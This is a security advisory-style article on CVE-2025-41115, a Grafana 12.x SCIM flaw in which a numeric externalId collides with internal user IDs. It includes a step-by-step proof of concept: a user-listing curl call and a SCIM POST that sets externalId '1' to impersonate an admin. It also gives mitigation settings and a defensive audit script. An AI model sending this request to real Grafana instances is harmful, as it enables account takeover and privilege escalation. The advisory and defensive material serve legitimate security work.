In April, Grafana introduced SCIM provisioning via Grafana Enterprise and Grafana Cloud. The intention was to help organizations automate user management—handling onboarding, offboarding, and team assignments seamlessly.

But in Grafana versions 12.x, a severe vulnerability was discovered in this SCIM provisioning feature: CVE-2025-41115. If the enableSCIM feature flag is enabled _and_ user_sync_enabled is set to true in the [auth.scim] config block, a SCIM client could exploit weak identity checks and assign numeric external IDs to new users. This can let an attacker impersonate other users or escalate privileges.

This article breaks down how the bug works, provides a proof of concept, and summarizes mitigation steps. Technical readers running Grafana Enterprise or Cloud in this scenario should act now.

How Does CVE-2025-41115 Work?

When SCIM provisioning is enabled and configured, Grafana trusts external SCIM clients to sync users. Every user provisioned through SCIM gets an externalId. Grafana expects this externalId to be a non-numeric string—usually a UUID or username. But versions 12.x don’t enforce this type strictly.

Problem: Numeric externalId Collisions

Internally, Grafana tracks users with numeric IDs (integers in the database). If a SCIM client creates a new user with an externalId like "5", and there’s already a user in Grafana with the internal ID 5, this dangerous ambiguity lets the new user override or impersonate the internal user.

Prerequisites

- Grafana 12.x with the enableSCIM feature flag enabled
- User sync is enabled (user_sync_enabled = true)

- You understand SCIM API basics (usually POST/PUT to /api/scim/v2/Users endpoint).

Step 1: Find a Target’s Internal User ID

You need to know the integer internal ID of the user you want to impersonate. This can sometimes be found in URLs or via other tooling if you have some access:

# Example: List users via API (with admin access)
curl -H "Authorization: Bearer <token>" https://grafana.example.com/api/admin/users

Step 2: Provision User with Numeric externalId

Post this JSON to the SCIM Users endpoint, setting "externalId": "1" (or whatever the internal target user ID is):

POST /api/scim/v2/Users
Content-Type: application/json

{
  "userName": "eviluser",
  "externalId": "1",
  "displayName": "Hacker User",
  "emails": [
     { "value": "evil@attacker.com", "primary": true }
  ],
  "active": true
}

With a Grafana 12.x instance (and required configs), Grafana may now link or map this new SCIM-created user directly to the existing user with internal ID 1—potentially giving you access to their account with their roles and privileges.

What Could Attackers Do?

- Impersonate privileged accounts. If you map to an admin’s internal ID, you can become an admin.

- Escalate privileges of your attacker-controlled user.

- Ghost in the system: Because you use a legitimate externalId, the logs may not flag your presence.

Original References

- Grafana Security Release Note for CVE-2025-41115
- SCIM Provisioning docs
- CVE page (once published)

Mitigation

Disable SCIM user sync in the [auth.scim] block of grafana.ini:

[auth.scim]
user_sync_enabled = false

- Revoke and audit users provisioned via SCIM recently.
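As an added defender-side check (written for this article, not code from Grafana or the original post), the script below does two things: it flags a grafana.ini whose enableSCIM toggle and user_sync_enabled are both on, and it rejects or audits SCIM user records whose externalId is purely numeric, which is the collision the bug relies on. The ini section names, the [feature_toggles] placement of enableSCIM, and the sample users are assumptions and constructed data.

```python
import configparser
import re
from typing import Optional

# Constructed grafana.ini fragment reproducing the vulnerable combination.
# Placing enableSCIM under [feature_toggles] is an assumption about layout.
VULNERABLE_INI = """
[feature_toggles]
enableSCIM = true

[auth.scim]
user_sync_enabled = true
"""

def scim_sync_exposed(ini_text: str) -> bool:
    """True when both the enableSCIM toggle and user_sync_enabled are on."""
    cfg = configparser.ConfigParser()
    cfg.read_string(ini_text)
    toggle = cfg.getboolean("feature_toggles", "enableSCIM", fallback=False)
    sync = cfg.getboolean("auth.scim", "user_sync_enabled", fallback=False)
    return toggle and sync

NUMERIC = re.compile(r"^\d+$")

def external_id_problem(user: dict) -> Optional[str]:
    """Reason to reject or flag a SCIM user record, or None if it looks sane.
    A purely numeric externalId can collide with a Grafana internal integer
    user ID, which is what CVE-2025-41115 exploits."""
    ext = user.get("externalId")
    if not isinstance(ext, str) or not ext.strip():
        return "missing externalId"
    if NUMERIC.match(ext.strip()):
        return f"numeric externalId {ext!r} may collide with an internal user ID"
    return None

def audit_scim_users(users: list) -> list:
    """(userName, reason) for every suspect record in a provisioned user list."""
    return [(u.get("userName", "?"), r) for u in users if (r := external_id_problem(u))]

# Constructed sample resembling a SCIM /Users listing (not real data).
SAMPLE_USERS = [
    {"userName": "alice", "externalId": "b1f5e5c2-8f0d-4b6a-9c1a-3d2e4f5a6b7c"},
    {"userName": "eviluser", "externalId": "1"},
    {"userName": "bob", "externalId": ""},
]

if __name__ == "__main__":
    print("sync exposed:", scim_sync_exposed(VULNERABLE_INI))
    for name, reason in audit_scim_users(SAMPLE_USERS):
        print(f"{name}: {reason}")
```

Run the audit against an export of recently provisioned SCIM users; anything it reports is a candidate for revocation.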

Conclusion

CVE-2025-41115 is a dangerous identity flaw in Grafana’s SCIM integration. If your instance is running Grafana 12.x with SCIM and user sync enabled, you must review your exposure immediately.

Stay safe, and keep an eye on Grafana security advisories.

*This article is exclusive and written for security teams and Grafana administrators to understand and mitigate CVE-2025-41115 rapidly. Share with your IT security colleagues.*

Timeline

Published on: 11/21/2025 15:15:52 UTC
Last modified on: 11/25/2025 22:16:42 UTC